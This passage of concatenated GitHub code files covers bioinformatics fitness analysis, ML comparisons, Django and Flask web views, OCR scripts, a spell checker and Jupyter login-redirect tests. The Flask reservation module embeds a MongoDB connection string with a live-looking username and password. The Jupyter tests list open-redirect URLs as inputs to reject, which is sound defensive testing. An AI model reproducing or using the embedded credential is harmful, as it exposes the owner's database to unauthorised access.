[sigma]}).reset_index()\n gene_mean.columns = ['gene', 'day', 'gene_FC', 'sigma']\n\n # Get all the WITS barcodes\n controls_bc = set(controls[controls.phenotype == 'wt'].barcode.values)\n cntrl_df = fitness.loc[fitness.index.intersection(controls_bc)]\n # Calculate mean log2FoldChange and sigma for the control barcodes (for all barcodes)\n cntrl_mean = cntrl_df.groupby(['day']).agg({'log2FoldChange': ['mean'], 'lfcSE': [sigma]})\n cntrl_mean.columns = ['cntrl_FC', 'cntrl_sigma']\n cntrl_mean = cntrl_mean.reset_index()\n # Calculate zscore and competitive index (CI) for each gene\n gene_mean = gene_mean.merge(cntrl_mean, how='left', on='day')\n gene_mean['zscore'] = gene_mean.apply(\n lambda x: calculate_2dist_zscore(x['gene_FC'], x['sigma'], x['cntrl_FC'], x['cntrl_sigma']), axis=1)\n gene_mean['ci'] = gene_mean.apply(lambda x: 2 ** x['gene_FC'] / 2 ** x['cntrl_FC'], axis=1)\n gene_mean = gene_mean[['gene', 'day', 'zscore', 'ci']]\n\n # Get all barcodes that were not mapped to a gene\n others_bc = set(df[(df.locus_tag.isna())].barcode.values)\n other_df = fitness.loc[fitness.index.intersection(others_bc)]\n other_df = other_df.merge(cntrl_mean, how='left', on='day')\n # Calculate zscore and CI for each barcode\n other_df['zscore'] = other_df.apply(\n lambda x: calculate_2dist_zscore(x['log2FoldChange'], x['lfcSE'], x['cntrl_FC'], x['cntrl_sigma']), axis=1)\n other_df['ci'] = other_df.apply(lambda x: 2 ** x['log2FoldChange'] / 2 ** x['cntrl_FC'], axis=1)\n other_df = other_df[['barcode', 'day', 'zscore', 'ci']].rename({'barcode': 'gene'}, axis=1)\n\n # Concatenate the gene and barcode results\n results = pd.concat([gene_mean, other_df])\n # Calculate p-values for the genes/barcodes\n results['pval'] = results.zscore.apply(lambda x: scipy.stats.norm.sf(abs(x)) * 2)\n\n # Spread results over days\n results = (results.pivot(index=['gene'], columns=['day'], values=['zscore', 'ci', 'pval'])\n .reset_index())\n # Rename columns\n results.columns = ['gene'] + [f'{day}_zscore' for day in days] + [f'{day}_ci' for day in days] + [f'{day}_pval' for\n day in days]\n # Adjust p-values for multiple testing\n for day in days:\n results[f'{day}_padj'] = \\\n statsmodels.stats.multitest.multipletests(results[f'{day}_pval'], alpha=0.05, method='fdr_bh')[1]\n return results.set_index('gene')\n\n\ndef to_list(x):\n bc_list = list(x)\n if len(bc_list) == 1:\n return bc_list[0]\n return \", \".join(list(x))\n\n\ndef get_control_fitness(fitness, controls):\n cnrls = controls.merge(fitness, how='left', on='barcode').assign(control='yes').drop(['DN'], axis=1)\n cnrls = cnrls[['barcode', 'phenotype', 'conc', 'log2FoldChange', 'n_samples', 'day', 'control']]\n cnrls = cnrls[cnrls.day.notnull()]\n days = list(cnrls.day.unique())\n cnrls = cnrls.pivot(index=['barcode','phenotype', 'conc', 'control'], columns=['day'], values=['log2FoldChange', 'n_samples']).reset_index()\n day_columns = [f'{day}_fitness' for day in days] + [f'{day}_num_samples' for day in days]\n cnrls.columns = ['barcode', 'phenotype', 'conc', 'control'] + day_columns\n return cnrls.set_index('barcode')\n\n\ndef final_fitness_table(fitness, exp_df, controls):\n barcode_info = exp_df[['barcode', 'locus', 'gene', 'library']].drop_duplicates().set_index('barcode')\n fit2 = fitness.merge(barcode_info, how='left', left_index=True, right_index=True)\n\n fit2_gene = fit2[(fit2.locus.notnull()) & (fit2.locus != '-')]\n fit3 = fit2_gene.groupby(['library', 'gene', 'locus', 'day', 'n_samples', ]).agg(\n {'barcode': ['count', to_list], 'log2FoldChange': ['mean', 'std']}).reset_index()\n fit3.columns = ['library', 'gene', 'locus', 'day', 'num_samples', 'num_barcodes', 'barcode', 'mean_fitness',\n 'std_fitness']\n\n fit4 = (fit3.pivot(index=['gene', 'locus', 'num_barcodes', 'barcode', 'library'], columns=['day'],\n values=['mean_fitness', 'std_fitness', 'num_samples'])\n .reset_index())\n\n # # if not mapped to gene\n fit2_no_gene = fit2[(fit2.locus.isna()) | (fit2.locus == '-')]\n fit_no_gene = fit2_no_gene.groupby(['barcode', 'library', 'day', 'n_samples', ]).agg(\n {'barcode': ['count', to_list], 'log2FoldChange': ['mean', 'std']}).reset_index()\n fit_no_gene.columns = ['gene', 'library', 'day', 'num_samples', 'num_barcodes', 'barcode', 'mean_fitness',\n 'std_fitness']\n\n fit_no_gene = (fit_no_gene.pivot(index=['gene', 'num_barcodes', 'barcode', 'library'], columns=['day'],\n values=['mean_fitness', 'std_fitness', 'num_samples'])\n .reset_index())\n\n days = list(exp_df.day.unique())\n days.remove('d0')\n day_columns = [f'{day}_fitness' for day in days] + [f'{day}_std_fitness' for day in days] + [f'{day}_num_samples'\n for day in days]\n fit4.columns = ['gene', 'locus', 'num_barcodes', 'barcode', 'library'] + day_columns\n fit_no_gene.columns = ['gene', 'num_barcodes', 'barcode', 'library'] + day_columns\n fit = pd.concat([fit4, fit_no_gene])\n fit = fit.merge(exp_df[['barcode', 'position', 'seq']].drop_duplicates(), how='left', on='barcode')\n cnrls = get_control_fitness(fitness, controls)\n cnrls['gene'] = cnrls.index\n return pd.concat([fit, cnrls]).set_index('gene')\n\n\ndef compare(dnaid, experiment, count_file, control_file, control_meta, outdir):\n controls = pd.read_csv(control_meta)\n fitness = get_fitness_results(outdir, dnaid, experiment)\n cnt_data = pd.read_csv(count_file, index_col=0)\n cntrl_data = pd.read_csv(control_file, index_col=0)\n data = pd.concat([cnt_data, cntrl_data])\n exp_cnt = subset_experiment(data, dnaid, experiment)\n results = calculte_comparisons(fitness, exp_cnt, controls)\n final = final_fitness_table(results, exp_cnt, controls)\n final.to_csv(Path(outdir)/f\"{dnaid}_{experiment}_final.csv\")\n return None\n\nif __name__ == \"__main__\":\n step = sys.argv[1]\n dnaid = sys.argv[2]\n experiment = sys.argv[3]\n count_file = sys.argv[4]\n control_file = sys.argv[5]\n outdir = sys.argv[6]\n controls_meta = sys.argv[7]\n cutoff = sys.argv[8]\n filter_below=sys.argv[9]\n\n if step == \"filter\":\n create_datasets(dnaid, count_file, control_file, outdir, cutoff, filter_below)\n elif step == \"compare\":\n compare(dnaid, experiment, count_file, control_file, controls_meta, outdir)\n","repo_name":"MicrobiologyETHZ/nccr_tnseq2","sub_path":"tnseq2/old_code/analysis/analysis2.py","file_name":"analysis2.py","file_ext":"py","file_size_in_byte":11282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18535276196","text":"import pre_processing\nimport pandas as pd\nimport model_1\nimport model_2\nimport model_3\nimport test_script\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('House_Data_Classification.csv')\ncleaned_data = pre_processing.pre_processingAll(data)\n\nprint(\"Logistic Regression : \")\n_, Lm_acc, Lm_train_time = model_1.Logistic_Reg(cleaned_data)\n\nprint(\"De Tree: \")\n_,Dec_acc,Dec_train_time=model_2.Dec_tree(cleaned_data)\n\nprint(\"SVM: \")\n_,SVM_acc,SVM_train_time= model_3.SVM(cleaned_data)\n\nprint('-----------------------------------------')\nprint('pickle models')\nLm_test_time,SVM_test_time,Dec_test_time = test_script.run_test_script(cleaned_data)\nprint('-----------------------------------------')\n\nprint(\"Logistic Reg test time : \",Lm_test_time)\nprint(\"SVM test time : \",SVM_test_time)\nprint(\"decision tree test time : \",Dec_test_time)\nfig = plt.figure(figsize=(6,5))\nplt.bar(['Lm_test_time','SVM_test_time','Dec_test_time'],[Lm_test_time,SVM_test_time,Dec_test_time])\nplt.xlabel('Models')\nplt.ylabel('Test Time')\nplt.show()\n\nfig = plt.figure(figsize=(5,5))\nplt.bar(['Lm_train_time','SVM_train_time','Dec_train_time'],[Lm_train_time,SVM_train_time,Dec_train_time])\nplt.xlabel('Models')\nplt.ylabel('Train Time')\nplt.show()\n\nfig = plt.figure(figsize=(5,5))\nplt.bar(['Lm_Acc','SVM_Acc','Dec_Acc'],[Lm_acc,SVM_acc,Dec_acc])\nplt.xlabel('Models')\nplt.ylabel('Accuracy')\nplt.show()","repo_name":"Maladawy10/ML-Project","sub_path":"Project/classModel.py","file_name":"classModel.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22661569539","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.conf import settings\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.utils import timezone\nfrom datetime import datetime\n\n# import models\nfrom .models import Rate, Transaction\n\n# dashboard\n@login_required\ndef dashboard(request):\n #rateList = Rate.objects.all()\n #output = ', '.join([q.rateItems for q in rateList])\n dollar_unit = get_object_or_404(Rate, currency_from=\"US Dollar\")\n peso_unit = get_object_or_404(Rate, currency_from=\"Peso\")\n euro_unit = get_object_or_404(Rate, currency_from=\"Euro\")\n canada_unit = get_object_or_404(Rate, currency_from=\"Canada Dollar\")\n user_transfer = Transaction.objects.all().filter(transfer_by = request.user,\n transfer_Date = timezone.now())\n context = {'dollar':dollar_unit, 'peso':peso_unit,\n 'euro':euro_unit, 'canada':canada_unit,\n 'transaction':user_transfer}\n return render(request,'transferApp/home.html', context)\n\n# transfer\n@login_required\ndef transfer(request):\n if request.method == 'GET':\n dollar_unit = get_object_or_404(Rate, currency_from=\"US Dollar\")\n peso_unit = get_object_or_404(Rate, currency_from=\"Peso\")\n euro_unit = get_object_or_404(Rate, currency_from=\"Euro\")\n canada_unit = get_object_or_404(Rate, currency_from=\"Canada Dollar\")\n context = {'dollar':dollar_unit, 'peso':peso_unit,\n 'euro':euro_unit, 'canada':canada_unit}\n return render(request, 'transferApp/transaction.html', context)\n elif request.method == 'POST':\n origin = request.POST[\"origingCurrency\"]\n originAmount = request.POST[\"receiveAmount\"]\n givenAmount = request.POST[\"giveAmount\"]\n rate = request.POST[\"unitRate\"]\n givenAmountVerification = float(rate) * float(originAmount)\n if givenAmountVerification != givenAmount:\n givenAmount = givenAmountVerification\n comment = request.POST[\"commentTransfer\"]\n transfer_by = request.user\n transaction = Transaction(transfer_origin=origin,transfer_originAmount=originAmount,\n transfer_givenAmount=givenAmount, rate=rate,\n transfer_comment=comment, transfer_by = transfer_by)\n transaction.save()\n return redirect(dashboard)\n\n# profile\n@login_required\ndef profile(request):\n return render(request, 'transferApp/profile.html')\n\n\n\n","repo_name":"jerry-maurice/CurrencyConvertion","sub_path":"transferApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25178368515","text":"#from webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium import webdriver\nfrom dotenv import load_dotenv\nimport os\n\nos.system(\"clear\")\nload_dotenv()\n\nCHROMEDRIVER_PATH = os.getenv('CHROMEDRIVER_PATH')\n\nservice = Service(CHROMEDRIVER_PATH)\nbrowser = webdriver.Chrome(service=service)\nbrowser.get('https://www.python.org/')\n\nevents_list = browser.find_elements_by_css_selector('div.medium-widget.event-widget.last ul li')\nevents = {}\n\nfor i in range(len(events_list)):\n events[i] = {\"time\": events_list[i].text.splitlines()[0], \"name\": events_list[i].text.splitlines()[1]}\n\nprint(events)\n\nbrowser.quit()","repo_name":"Tiago-S-Ribeiro/Python-Pro-Bootcamp","sub_path":"100_days_of_code/Intermediate+/day_48/practice/pythonorg_test.py","file_name":"pythonorg_test.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29232228057","text":"from flask import Flask, render_template, redirect, Blueprint, url_for, request\nfrom pymongo import MongoClient, ReturnDocument\nfrom flask_cors import CORS\nimport certifi\nimport random\nimport string\n\nreservation = Blueprint('reservation', __name__)\n\nCORS(reservation)\n\nclient = MongoClient(f\"mongodb+srv://sc_delaEmi:u2JsEd0nzYssgaMd@cluster0.8qczawe.mongodb.net/test?retryWrites=true&w=majority\",tlsCAFile=certifi.where()) \ndb=client['test']\nreservations=db.reservations\n\n#Reference to the spaces collection in the database\n#lay as of layout\nlay = db.spaces\n\n\n#Redirect to the specific restaurant in html\n@reservation.route('/respageBurritos', methods=['POST'])\ndef respageBurritos():\n hour = request.form.get('restaurantHour')\n location = request.form.get('restaurantType')\n name = request.form.get('restaurantId')\n tab = request.form.get('tabId')\n print(name)\n return render_template(\"./reservation.html\", restaurant=\"Burrito\", hour=hour, location=location, name=name, tab=tab)\n\n@reservation.route('/respageBurger', methods=['POST'])\ndef respageBurger():\n hour = request.form.get('restaurantHour')\n location = request.form.get('restaurantType')\n name = request.form.get('restaurantId')\n tab = request.form.get('tabId')\n return render_template(\"./reservation.html\", restaurant=\"Burger\", hour=hour, location=location, name=name, tab=tab)\n\n@reservation.route('/respageMenudo', methods=['POST'])\ndef respageMenudo():\n hour = request.form.get('restaurantHour')\n location = request.form.get('restaurantType')\n name = request.form.get('restaurantId')\n tab = request.form.get('tabId')\n return render_template(\"./reservation.html\", restaurant=\"Menudo\", hour=hour, location=location, name=name, tab=tab)\n\n@reservation.route('/respagePizza', methods=['POST'])\ndef respagePizza():\n hour = request.form.get('restaurantHour')\n location = request.form.get('restaurantType')\n name = request.form.get('restaurantId')\n tab = request.form.get('tabId')\n print(name)\n return render_template(\"./reservation.html\", restaurant=\"Pizza\", hour=hour, location=location, name=name, tab=tab)\n\n@reservation.route('/respageChinese', methods=['POST'])\ndef respageChinese():\n hour = request.form.get('restaurantHour')\n location = request.form.get('restaurantType')\n name = request.form.get('restaurantId')\n tab = request.form.get('tabId')\n return render_template(\"./reservation.html\", restaurant=\"Chinese\", hour=hour, location=location, name=name, tab=tab)\n#-------------------------------------------------------------------------\n\n@reservation.route('/confirmationPage', methods=['POST'])\ndef confirmationPage():\n #Generates random key\n letters=string.ascii_lowercase\n result=''.join(random.choice(letters) for i in range(5))\n print(result)\n #---------------------------------\n\n arr = list(lay.find({'restaurantName': request.form.get('restaurantName'), 'hour': request.form.get('seletedHour'),\"tab_id\": request.form.get('tabId')}, {\"_id\":0, \"restaurantName\":1, \"hour\":1, \"tab_id\":1, \"avalible\":1}))\n print(arr[0][\"avalible\"])\n if arr[0][\"avalible\"]:\n db.reservations.insert_one({\n 'restaurantName': request.form.get('restaurantName'),\n 'reservationName': request.form.get('nameInput'),\n 'guests': request.form.get('inputGuess'),\n 'times': request.form.get('seletedHour'),\n 'adaneeded': request.form.get('ada'),\n 'coments': request.form.get('comments'),\n 'key': result,\n 'tab_id':request.form.get('tabId')})\n \n\n lay.update_one(\n { 'tab_id':request.form.get('tabId'), 'restaurantName': request.form.get('restaurantName'), 'hour': request.form.get('seletedHour')},\n {\"$set\": { \"avalible\": False }}\n )\n\n return render_template(\"./confirmationPage.html\", result=result)\n else:\n return \"Invalid\"\n \n#---------------------------------------------------------------------\n\n\n@reservation.route('/deleteReservation')\ndef deleteReservationForm():\n return render_template(\"./deleteReservation.html\")\n\n@reservation.route('/deleteReservationQuery', methods=['POST'])\ndef deleteReservation():\n name = request.form.get('userName')\n keyRes = request.form.get('keyRes')\n\n reservationList = list(reservations.find({\"reservationName\": name, \"key\": keyRes}, {\"_id\":0, \"tab_id\":1, \"restaurantName\":1, \"times\":1}))\n\n if len(reservationList) < 1:\n alertMsg = \"Invalid reservation\"\n return render_template(\"./deleteReservation.html\", alertMsg=alertMsg)\n\n reservation = reservations.find_one({\"reservationName\": name, \"key\": keyRes})\n\n if reservation:\n reservations.delete_one({\"reservationName\": name, \"key\": keyRes})\n\n lay.update_one(\n { 'tab_id':reservationList[0]['tab_id'], 'restaurantName':reservationList[0]['restaurantName'], 'hour':reservationList[0]['times']},\n {\"$set\": { \"avalible\": True }}\n )\n return render_template(\"./conPage.html\", output=\"Query has been deleted\")\n else:\n alertMsg = \"Reservation does not exist\"\n return render_template(\"./deleteReservation.html\", alertMsg=alertMsg)\n#---------------------------------------------------------------------\n\n@reservation.route('/editReservation')\ndef editReservationForm():\n return render_template(\"./editReservationQuery.html\")\n\n@reservation.route('/editReservationFinder', methods=['POST'])\ndef editReservationFinder():\n name=request.form.get('userName')\n keyRes=request.form.get('keyRes')\n\n reservation = reservations.find_one({\"reservationName\": name, \"key\": keyRes})\n if reservation:\n query = {\n \"reservationName\": reservation[\"reservationName\"],\n \"guests\": reservation[\"guests\"],\n \"adaneeded\": reservation[\"adaneeded\"],\n \"coments\": reservation[\"coments\"],\n \"restaurantName\": reservation[\"restaurantName\"],\n \"times\": reservation[\"times\"],\n \"key\": reservation[\"key\"]\n }\n return render_template(\"./editReservation.html\", query=query)\n else:\n alertMsg = \"Reservation does not exist\"\n return render_template(\"./editReservationQuery.html\", alertMsg=alertMsg)\n \n\n@reservation.route('/editReservationQuery', methods=['POST'])\ndef editReservationQuery():\n name=request.form.get('userName')\n guestNo=request.form.get('guests')\n keyRes=request.form.get('keyRes')\n comments=request.form.get('coments')\n print(name)\n\n print(reservations.update_one(\n { \"reservationName\":name, \"key\":keyRes},\n { \"$set\": { \"guests\": guestNo,\n \"coments\": comments } }\n ))\n \n return render_template(\"./conPage.html\", output=\"Query has been updated\")\n","repo_name":"Emiliano-DLC/ResRev","sub_path":"reservation.py","file_name":"reservation.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74976093538","text":"import sqlite3\nimport re\nimport xml.etree.ElementTree as ET\nimport string\nimport numpy as np\nfrom nltk.tokenize import word_tokenize\nfrom collections import Counter\n\n# Method to parse a TMX file and dump its contents into a database\ndef tmx_to_sql(db_path, tmx_path):\n # Opening and connecting to database\n conn = sqlite3.connect(db_path)\n cur = conn.cursor()\n \n # Creating table if not exists\n cur.execute(\"\"\"CREATE TABLE IF NOT EXISTS \"translations\" (\n \"source_text\" TEXT,\n \"target_text\" TEXT,\n \"source_lang\" TEXT,\n \"target_lang\" TEXT\n );\"\"\")\n \n # Running some replacements in TMX file\n try:\n with open(tmx_path, 'rt', encoding=\"utf-8-sig\") as f:\n content = f.read()\n print('Reading', tmx_path)\n content = content.replace(\"xml:lang\", \"lang\") # modifying lang attribute so the parser captures it\n content = re.sub(']*?>', '', content) # removing bpt tags from TMX/XLIFF\n content = re.sub(']*?>', '', content) # removing ept tags from TMX/XLIFF\n with open(tmx_path, 'wt', encoding=\"utf-8-sig\") as f:\n f.write(content)\n except: # trying reading with UTF-16 encoding and writing as UTF-8 BOM so the ET parser recognizes as XML\n try:\n with open(tmx_path, 'rt', encoding='utf16') as f:\n content = f.read()\n print('Reading', tmx_path)\n content = content.replace(\"xml:lang\", \"lang\") # modifying lang attribute so the parser captures it\n content = re.sub(']*?>', '', content) # removing bpt tags from TMX/XLIFF\n content = re.sub(']*?>', '', content) # removing ept tags from TMX/XLIFF\n content = content.replace(\"UTF-16LE\", \"utf-8\") # avoiding encoding issue when parsing TMX\n with open(tmx_path, 'wt', encoding=\"utf-8-sig\") as f:\n f.write(content)\n except: # showing file with error\n print('Error reading file', tmx_path)\n \n # Parsing TMX file\n doc = ET.parse(tmx_path)\n root = doc.getroot()\n tu_list = root.findall(\"./body/tu\")\n \n # Looping through every translation unit\n for tu in tu_list:\n # Getting the translation unit pairs\n tuv = tu.findall(\"tuv\")\n\n for i in range(1, len(tuv)):\n # Retrieving specific values for our database\n source_text = tuv[0].find(\"seg\").text\n target_text = tuv[i].find(\"seg\").text\n source_lang = tuv[0].get(\"lang\").lower()\n target_lang = tuv[i].get(\"lang\").lower()\n \n # Inserting entries into our database\n cur.execute(\"INSERT INTO translations VALUES (?, ?, ?, ?)\", (source_text, target_text, source_lang, target_lang))\n \n # Committing the changes into the database\n conn.commit()\n \n # Closing database connection\n cur.close()\n conn.close()\n\n\n# Method to clean or pre-process the sentence before its use\ndef process_sentence(sentence):\n '''\n Input:\n sentence: a string containing the retrieved sentence\n Output:\n sentence_clean: a list of words containing the processed sentence\n '''\n # Removing punctuation from the sentence\n sentence = sentence.translate(str.maketrans('', '', string.punctuation))\n sentence = re.sub('[0-9]', '', sentence) # removing numbers\n \n # Tokenizing sentence\n sentence_tokens = word_tokenize(sentence)\n \n sentence_clean = []\n for word in sentence_tokens:\n sentence_clean.append(word.lower()) # lowering word\n \n return sentence_clean\n\n\n# Method to build the frequency dictionary\ndef build_freqs(words_all):\n '''\n Input:\n words_all: a list of words representing the corpus. \n Output:\n freqs: The wordcount dictionary where key is the word and value is its frequency.\n '''\n \n freqs = {}\n for word in words_all:\n if word in freqs.keys(): # incrementing the count if the word already exists in the dictionary\n freqs[word] += 1\n else: # setting to 1 since the word doesn't exist yet in the dictionary\n freqs[word] = 1\n \n return freqs\n\n\n# Method to build the probabilities dictionary\ndef get_probs(freqs, num_words):\n '''\n Input:\n freqs: The wordcount dictionary where key is the word and value is its frequency\n num_words: The number of total words from the words_all list (no duplicates)\n Output:\n probs: A dictionary where keys are the words and the values are the probability that a word will occur\n '''\n probs = {}\n \n for word, freq in freqs.items():\n probs[word] = freq / num_words # getting the probability of a word appearing in the whole corpus (frequency of a word divided by total number of words)\n \n return probs\n\n\n# Method to find every single occurrence of output words when a character is deleted\ndef delete_letter(word):\n '''\n Input:\n word: input word\n Output:\n delete_l: a list of all possible words obtained by deleting 1 character from word\n '''\n\n # Using list comprehensions\n split_l = [(word[:i], word[i:]) for i in range(len(word) + 1)] # splitting a word into all possible tuples with two elements (left and right)\n delete_l = [L + R[1:] for L, R in split_l if len(R) > 0] # building word by removing the first character in the right part of every tuple\n\n return delete_l\n\n\ndef switch_letter(word):\n '''\n Input:\n word: input string\n Output:\n switches: a list of all possible strings with one adjacent charater switched\n ''' \n\n # Using list comprehensions\n split_l = [(word[:i], word[i:]) for i in range(len(word) + 1)] # splitting a word into all possible tuples with two elements (left and right)\n switch_l = [L + R[1] + R[0] + R[2:] for L, R in split_l if len(R) > 1] # building word by switching first and second characters from the right part of every tuple\n\n return switch_l\n\n\ndef replace_letter(word):\n '''\n Input:\n word: input word \n Output:\n replaces: a list of all possible strings where we replaced one letter from the original word\n ''' \n \n letters = 'abcdefghijklmnopqrstuvwxyz'\n replace_l = []\n \n split_l = [(word[:i], word[i:]) for i in range(len(word) + 1)] # splitting a word into all possible tuples with two elements (left and right)\n for L, R in split_l:\n if len(R) > 0:\n for letter in letters:\n replace_l.append(L+R[0].replace(R[0], letter) + R[1:]) # building word by replacing the first character from the right part of the tuple with any letter\n replace_set = set(replace_l)\n replace_set.discard(word)\n replace_l = list(replace_set)\n \n return replace_l\n\n\ndef insert_letter(word):\n '''\n Input:\n word: input word\n Output:\n inserts: a set of all possible strings with one new letter inserted at every position\n ''' \n letters = 'abcdefghijklmnopqrstuvwxyz'\n insert_l = []\n \n split_l = [(word[:i], word[i:]) for i in range(len(word) + 1)] # splitting a word into all possible tuples with two elements (left and right)\n for L, R in split_l:\n for letter in letters:\n insert_l.append(L + letter + R[0:]) # building word by inserting a letter before the first character from the right part of the tuple\n \n return insert_l\n\ndef edit_one_letter(word):\n \"\"\"\n Input:\n word: the input word for which we will generate all possible words that are one edit away\n Output:\n edit_one_set: a set of words with one possible edit\n \"\"\"\n \n edit_one_list = list()\n\n # Appending every possible word that can be formed by deleting, switching, replacing or inserting a letter from the word\n edit_one_list += delete_letter(word)\n edit_one_list += switch_letter(word)\n edit_one_list += replace_letter(word)\n edit_one_list += insert_letter(word)\n \n edit_one_set = set(edit_one_list)\n\n return edit_one_set\n\n\ndef edit_two_letters(word):\n '''\n Input:\n word: the input word for which we will generate all possible words that are two edits away\n Output:\n edit_two_set: a set of words with all possible two edits\n '''\n \n edit_one_list = list()\n edit_two_list = list()\n\n # Appending every possible word that can be formed by deleting, switching, replacing or inserting a letter from the word\n edit_one_list += delete_letter(word)\n edit_one_list += switch_letter(word)\n edit_one_list += replace_letter(word)\n edit_one_list += insert_letter(word)\n\n # Doing the same as above (being two edit distance now) from every possible word formed previously\n for edit_one_word in edit_one_list:\n edit_two_list += delete_letter(edit_one_word)\n edit_two_list += switch_letter(edit_one_word)\n edit_two_list += replace_letter(edit_one_word)\n edit_two_list += insert_letter(edit_one_word)\n \n edit_two_set = set(edit_two_list)\n \n return edit_two_set\n\n\ndef get_corrections(word, probs, vocab, n):\n '''\n Input: \n word: a user entered word to check for suggestions\n probs: a dictionary that maps each word to its probability in the corpus\n vocab: a list containing all the vocabulary\n n: number of possible word corrections you want returned in the dictionary\n Output: \n n_best: a list of tuples with the most probable n corrected words and their probabilities\n '''\n \n suggestions = [] # list where all the possible suggestions will be appended\n suggestions_dict = {} # dictionary where only the suggested words appering in the vocabulary will be added, along with its probability in the corpus\n n_best = [] # list of tuples where the specific number of final suggestions (n) will be returned\n\n # Getting suggestions at one edit distance\n suggestions = list(edit_one_letter(word))\n\n # Looping through every suggestion in the vocabulary and building the suggestions dictionary with their probabilities\n for suggestion in suggestions:\n if suggestion in vocab:\n prob = probs[suggestion]\n suggestions_dict[suggestion] = prob\n\n # If we don't get any suggestions at one edit distance, we'll look for suggestions at two edit distance\n if len(suggestions_dict) == 0:\n further_suggestions = list(edit_two_letters(word))\n for further_suggestion in further_suggestions:\n if further_suggestion in vocab:\n prob = probs[further_suggestion]\n suggestions_dict[suggestion] = prob\n\n # Sorting the dictionary with the helper function Counter to get the most common words\n c = Counter(suggestions_dict)\n n_best = c.most_common(n) # list of tuples (word, probability) sorted by most common\n \n return n_best\n","repo_name":"CarlosNLP/language-model","sub_path":"spell-checker/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73676267617","text":"import time\nimport os\nimport pdf_to_image as pf\nimport tesseractIO as Tessa\nimport pdf_to_tiff as red\nimport gc\nfrom bridge import bridger\n\nstart_time = time.time()\npdf_loc = os.path.abspath('./1. Pdf_input/')\nimg_out = os.path.abspath('./2. Images_to_parse/')\ntxt_out = os.path.abspath('./3. Output_txt/')\nbridge_path = os.path.abspath('./4. Bridge/')\n\n\ndef i_parse_pdf(pdfname, out_name):\n pf.pdftopil(pdfname, img_out, out_name, 'png')\n\n\ndef i_deliver_txt(in_fold, out_fold):\n in_fold = '\"' + in_fold + '\"'\n out_fold = '\"' + out_fold + '\"'\n lang = 'eng'\n Tessa.write_command(in_parse=in_fold, outcome=out_fold + '-' + lang, lang=lang)\n gc.collect()\n\n\ndef i_see_dead_people(in_fold, out_fold):\n in_fold = '\"' + in_fold + '\"'\n out_fold = '\"' + out_fold + '\"'\n # ell0: big, ell1: fast,\n # ell: best, ell3: last\n # eng\n red.write_command(in_parse=in_fold, outcome=out_fold)\n gc.collect()\n\n\ndef deliverance(path, out_path, func_to_call):\n for i in os.listdir(path):\n gc.collect()\n final = str(path + '\\\\' + i)\n final_out = str(out_path + '\\\\' + str(i).split('.')[0])\n func_to_call(final, final_out)\n\n\nif __name__ == '__main__':\n s = input('choose what to parse:')\n\n if s == 'pdf':\n deliverance(pdf_loc, img_out, i_parse_pdf)\n elif s == 'txt':\n deliverance(img_out, txt_out, i_deliver_txt)\n elif s == 'side':\n deliverance(pdf_loc, img_out, i_see_dead_people)\n elif s == 'bridge':\n deliverance(txt_out, bridge_path, bridger)\n print(\"Time taken : \" + str(time.time() - start_time))\n","repo_name":"humble-goat/invoice-to-txt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18431617173","text":"\"\"\"Tests for login redirects\"\"\"\n\nfrom functools import partial\nfrom urllib.parse import urlencode\n\nimport pytest\nfrom tornado.httpclient import HTTPClientError\nfrom tornado.httputil import url_concat, parse_cookie\n\nfrom jupyter_server.utils import url_path_join\n\n\n# override default config to ensure a non-empty base url is used\n@pytest.fixture\ndef jp_base_url():\n return \"/a%40b/\"\n\n\n@pytest.fixture\ndef jp_server_config(jp_base_url):\n return {\n \"ServerApp\": {\n \"base_url\": jp_base_url,\n },\n }\n\n\nasync def _login(jp_serverapp, http_server_client, jp_base_url, next):\n # first: request login page with no creds\n login_url = url_path_join(jp_base_url, \"login\")\n first = await http_server_client.fetch(login_url)\n cookie_header = first.headers[\"Set-Cookie\"]\n cookies = parse_cookie(cookie_header)\n\n # second, submit login form with credentials\n try:\n resp = await http_server_client.fetch(\n url_concat(login_url, {\"next\": next}),\n method=\"POST\",\n body=urlencode(\n {\n \"password\": jp_serverapp.token,\n \"_xsrf\": cookies.get(\"_xsrf\", \"\"),\n }\n ),\n headers={\"Cookie\": cookie_header},\n follow_redirects=False,\n )\n except HTTPClientError as e:\n if e.code != 302:\n raise\n return e.response.headers[\"Location\"]\n else:\n assert resp.code == 302, \"Should have returned a redirect!\"\n\n\n@pytest.fixture\ndef login(jp_serverapp, http_server_client, jp_base_url):\n \"\"\"Fixture to return a function to login to a Jupyter server\n\n by submitting the login page form\n \"\"\"\n yield partial(_login, jp_serverapp, http_server_client, jp_base_url)\n\n\n@pytest.mark.parametrize(\n \"bad_next\",\n (\n r\"\\\\tree\",\n \"//some-host\",\n \"//host{base_url}tree\",\n \"https://google.com\",\n \"/absolute/not/base_url\",\n ),\n)\nasync def test_next_bad(login, jp_base_url, bad_next):\n bad_next = bad_next.format(base_url=jp_base_url)\n url = await login(bad_next)\n assert url == jp_base_url\n\n\n@pytest.mark.parametrize(\n \"next_path\",\n (\n \"tree/\",\n \"//{base_url}tree\",\n \"notebooks/notebook.ipynb\",\n \"tree//something\",\n ),\n)\nasync def 